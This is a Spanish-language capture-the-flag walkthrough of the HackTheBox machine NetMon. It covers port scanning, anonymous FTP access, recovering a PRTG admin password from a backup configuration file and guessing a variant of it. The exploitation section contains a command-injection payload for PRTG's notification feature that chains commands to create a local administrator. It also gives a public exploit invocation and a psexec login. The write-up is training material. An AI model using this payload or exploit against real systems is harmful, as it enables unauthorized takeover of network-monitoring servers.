NetMon
Publicado: 09 de Junio de 2025 Autor: José Miguel Romero aKa x3m1Sec Dificultad: ⭐ Easy
📝 Descripción
NetMon es una máquina de dificultad Easy de HackTheBox que ejecuta Windows Server. La máquina presenta un servicio FTP con acceso anónimo habilitado que permite acceder al sistema de archivos completo, facilitando la obtención de la flag de usuario. Para la escalada de privilegios, se explota una vulnerabilidad de ejecución remota de comandos autenticada en PRTG Network Monitor 18.1.37.13946, lo que permite crear un usuario administrador y obtener acceso completo al sistema.
La máquina enseña conceptos importantes como la enumeración de servicios FTP, análisis de archivos de configuración, password guessing basado en patrones, y explotación de aplicaciones web empresariales.
🔭 Reconocimiento
Ping para verificación en base a TTL
❯ ping -c2 10.10.10.152
PING 10.10.10.152 (10.10.10.152) 56(84) bytes of data.
64 bytes from 10.10.10.152: icmp_seq=1 ttl=127 time=46.2 ms
64 bytes from 10.10.10.152: icmp_seq=2 ttl=127 time=47.6 ms
--- 10.10.10.152 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1007ms
rtt min/avg/max/mdev = 46.162/46.873/47.585/0.711 ms💡 Nota: El TTL cercano a 128 sugiere que probablemente sea una máquina Windows.
Escaneo de puertos TCP
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.95 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//)❯ echo $ports
21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669Enumeración de servicios
❯ nmap -sC -sV -p$ports 10.10.10.152 -oN services.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-09 15:33 CEST
Nmap scan report for 10.10.10.152
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-06-09T13:53:56
|_ start_date: 2025-06-09T13:41:28
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 18m57s, deviation: 0s, median: 18m57s
🚪 Enumeración de Servicios
🗂️ 21 FTP
La enumeración con nmap nos muestra que la autenticación anónima está habilitada en el servicio FTP.
Para poder enumerar de una manera mas comoda los archivos mediante ftp, vamos a crearnos una montura con la herramienta curlftpfs.
mkdir /mnt/monturaftp
curlftpfs ftp://10.10.10.152 /mnt/monturaftp
ls -l /mnt/monturaftptotal 721284
d--------- 1 root root 0 Nov 20 2016 '$RECYCLE.BIN'
---------- 1 root root 1 Jul 16 2016 BOOTNXT
d--------- 1 root root 0 Feb 3 2019 'Documents and Settings'
d--------- 1 root root 0 Jul 16 2016 PerfLogs
d--------- 1 root root 0 Feb 25 2019 'Program Files'
d--------- 1 root root 0 Feb 3 2019 'Program Files (x86)'
d--------- 1 root root 0 Dec 15 2021 ProgramData
d--------- 1 root root 0 Feb 3 2019 Recovery
d--------- 1 root root 0 Feb 3 2019 'System Volume Information'
d--------- 1 root root 0 Feb 3 2019 Users
d--------- 1 root root 0 Nov 10 2023 Windows
---------- 1 root root 389408 Nov 20 2016 bootmgr
d--------- 1 root root 0 Feb 25 2019 inetpub
---------- 1 root root 738197504 Jun 9 10:41 pagefile.sys
Encontramos y descargamos la primera flag del directorio Desktop del perfil del usuario Public:
🌐 445 SMB
Dado que no tenemos credenciales, intentamos enumerar información mediante sesión anónima pero no parece estar habilitada. No hay mucho que rascar aquí.
smbclient -N -L //10.10.10.152
session setup failed: NT_STATUS_ACCESS_DENIEDnetexec smb 10.10.10.152 -u '' -p '' --shares
SMB 10.10.10.152 445 NETMON [*] Windows 10 / Server 2016 Build 14393 x64 (name:NETMON) (domain:netmon) (signing:False) (SMBv1:True)
SMB 10.10.10.152 445 NETMON [-] netmon\: STATUS_ACCESS_DENIED
SMB 10.10.10.152 445 NETMON [-] Error enumerating shares: Error occurs while reading from remote(104) enum4linux 10.10.10.152
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jun 9 18:06:08 2025
=========================================( Target Information )=========================================
Target ........... 10.10.10.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.152 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.152 )================================
Looking up status of 10.10.10.152
No reply from 10.10.10.152
===================================( Session Check on 10.10.10.152 )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.🌍 80 HTTP ( PRTG Network Monitor 18.1.37.13946 )
Accedemos a http://10.10.10.152/ y encontramos un servicio llamado PRTG Network Monitor
PRTG Network Monitor ==es un software de monitorización de redes que permite supervisar el rendimiento y la disponibilidad de la infraestructura de TI==. Esta herramienta de Paessler es utilizada para monitorizar dispositivos como servidores, routers, switches, aplicaciones y servicios, así como métricas como la salud, la disponibilidad, el tráfico y el ancho de banda
Buscando información pública encontramos que las credenciales por defecto de esta aplicación son:
Username:
prtgadminPassword:
prtgadmin
Pero no parecen funcionar en esta ocasión.
Fuzzing de directorios
Realizamos fuzzing de directorios contra el puerto 80 pero en este caso no encontramos nada.
🔍 Análisis de Configuración
Aprovechando que tenemos acceso a la máquina a través de la sesión anónima FTP. Buscamos información sobre el servicio PRTG Network Monitor y posibles rutas de interés donde guarda archivos de configuración:
https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
%programdata%\Paessler\PRTG Network Monitor
🔐 Obtención de Credenciales
Es bastante contenido, por lo que podemos descargarlo a nuestro host de ataque y analizarlo detenidamente:
mkdir NetMon
cd NetMon
wget -r ftp://10.10.10.152/ProgramData/PaesslerPodemos intentar jugar con grep y algunas expresiones para filtrar por cadenas como "password"
grep -r -l 'password' PRTG\ Network\ Monitor 2>/dev/null
Los siguientes archivos parecen contener la palabra "password". Encontramos unas credenciales en el archivo PRTG Configuration.old.bak
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>Probamos estas credenciales en el servicio pero no funcionan:
Podemos tratar de hacer "guessing" y dado que el final de la contraseña coincide con el año, podemos ir probando otros años para ver si tenemos suerte:
PrTg@dmin2019Y logramos acceder al aplicativo y además enumeramos la versión
💥 Explotación
Buscamos exploits públicos y encontramos uno que nos permite explotar una ejecución remota de comandos autenticada.
searchsploit network monitor 18
Método 1 - Usando Exploit público
Dado que ahora tenemos credenciales, usaremos este exploit.
El script nos pide indicar la url del servicio y una cookie para llevar a acabo la explotación logrando así crear un usuario en el grupo de administradores llamado pentest cuya contraseña será P3nT3st!
Una vez autenticados en Network Monitor podemos usar por ejemplo la extensión Cookie Editor para copiar la cookie en formato Header String:
_ga=GA1.4.249250931.1749485289;_gid=GA1.4.1024515395.1749485289;OCTOPUS1813713946=ezcxQUI5MUYwLTgwQkItNEUxRS04QUUyLUJBNEU4NkE2Q0E2NH0%3DDe tal forma que el comando para ejecutar el exploit nos quedaría así:
./46527.sh -u http://10.10.10.152 "_ga=GA1.4.249250931.1749485289;_gid=GA1.4.1024515395.1749485289;OCTOPUS1813713946=ezcxQUI5MUYwLTgwQkItNEUxRS04QUUyLUJBNEU4NkE2Q0E2NH0%3D"
Método 2 - Explotación Manual
Navegamos a siguiente opción: Setup -> Accounts Settings -> Notifications
Hacemos scroll hasta abajo y habilitamos la opción Execute Program y especificamos el siguiente payload para la inyección:
test.txt;net user pentest p3nT3st! /add;net localgroup administrators pentest /add
Una vez guardada la notificación. Volvemos atrás a la lista de notificaciones, seleccionamos la nuestra y hacemos click en el botón de la campana:
🏆 Post-Explotación
Esperamos unos segundos y ahora ya deberemos confirmar que ha ido bien probando la nueva cuenta de administrador con el servicio SMB:
netexec smb 10.10.10.152 -u 'pentest' -p 'p3nT3st!'
Usamos impacket para ganar acceso a la máquina con la nueva cuenta que hemos creado y obtenemos la flag:
impacket-psexec pentest:'p3nT3st!'@10.10.10.152 
Last updated